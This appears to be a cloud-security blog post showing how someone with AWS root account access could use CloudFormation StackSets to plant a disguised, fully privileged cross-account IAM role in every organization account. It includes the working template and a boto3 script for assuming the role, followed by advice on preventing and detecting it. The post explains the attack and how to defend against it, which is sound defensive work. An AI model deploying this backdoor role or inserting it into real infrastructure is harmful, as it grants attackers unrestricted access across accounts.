How an Attacker Could Gain Access to AWS Accounts (and How to Stop Them)
In AWS organizations, we often have multiple accounts for different purposes: sandbox environments, production, and others. Access to these accounts is typically granted based on user roles. Some users may have access to just a few accounts, while others may have broader permissions.
But what if I told you that with root account access, an attacker could gain access to other accounts in your organization and deploy resources? Sounds unbelievable? Believe it or not, this is possible using just one AWS service. Let’s walk through how this can happen — and how to stop it.
How an Attacker Could Gain Access to All Organizational Accounts
Step 1: Log into the Root Account
First, log into your AWS root account and go to the AWS CloudFormation service to create a new StackSet.
Step 2: Deploy the StackSet Using a Malicious Template
You can deploy a StackSet across your organization with the following template, which creates a new role that any user in your organization can assume:
AWSTemplateFormatVersion: 2010-09-09
Description: Organizational Security Team Account Role Creation
Parameters:
UserARN:
Type: String
Description: Security Team cross-account access for Terraform deployment
Resources:
GainAccessRole:
Type: AWS::IAM::Role
Properties:
RoleName: gain-access-role
AssumeRolePolicyDocument:
Version: 2012-10-17
Statement:
- Effect: Allow
Principal:
AWS:
- !Ref UserARN
Action:
- sts:AssumeRole
Policies:
- PolicyName: gain-access-policy
PolicyDocument:
Version: 2012-10-17
Statement:
- Effect: Allow
Action: "*"
Resource: "*"
SecurityTeamOrgRoleInstanceProfile:
Type: AWS::IAM::InstanceProfile
Properties:
Roles:
- !Ref GainAccessRoleThis template creates a new role, gain-access-role, with permissions that allow any user in the organization to assume the role and gain unrestricted access to all AWS resources across your accounts.
Step 3: Deploy the StackSet
Using the SERVICE_MANAGED permission model, deploy the StackSet across your organization. When prompted, use arn:aws:iam::*:root as the parameter for `UserARN` and deploy the StackSet to all accounts in your AWS organization.
How to Gain Access Using Boto3
Once the StackSet is deployed successfully, the attacker can assume the gain-access-role from their AWS account. To access resources in other accounts, the attacker can export the AWS_ACCESS_KEY_ID and AWS_SECRET_ACCESS_KEY in their terminal and use a script like this:
import boto3
session = boto3.Session()
sts = session.client("sts")
response = sts.assume_role(
RoleArn="arn:aws:iam::<Target_account_ID>:role/gain-access-role",
RoleSessionName="gain-cross-account-access"
)
print(response)With this access, the attacker can now interact with resources in any account using the boto3 library.
How to Prevent This from Happening
While this demonstrates how easily unauthorized access can be gained, it’s essential to know how to prevent such scenarios in the first place. AWS organizations can have hundreds of IAM roles created and deleted daily, which increases the risk of overlooked permissions and potential security gaps.
1. Limit Root Account Access
The root account is the most sensitive account in any AWS organization. If compromised, attackers can gain control of everything. Here’s how to minimize the risk:
- Limit root account access to a small, trusted group.
- Ensure no services or applications (sandbox or production) run in the root account.
- Regularly monitor root account activity and enforce Multi-Factor Authentication (MFA).
2. Monitor and Alert for Risky IAM Policies
One of the easiest ways for attackers to gain access is through overly permissive IAM roles. To prevent this, you should:
- Set up AWS Lambda alerts to notify you when any IAM role or user is created with a wildcard
arn:aws:iam::*:root policy. - Use AWS CloudTrail to track IAM role creation events and flag any roles that grant overly broad cross-account access.
- Regularly audit IAM policies to ensure no roles have permissive AssumeRole permissions that could allow unauthorized access.
Final Thoughts
This blog has shown how an attacker can exploit AWS CloudFormation and IAM roles to gain access to all accounts within an organization. Fortunately, by restricting root account access and setting up alerts for risky IAM policies, you can effectively mitigate this threat.
AWS security is not a one-time setup. It requires constant vigilance, regular audits, and proactive measures to ensure your cloud environment remains secure. By applying best practices like least privilege and continuous monitoring, you can minimize the risk of unauthorized access to your AWS accounts.
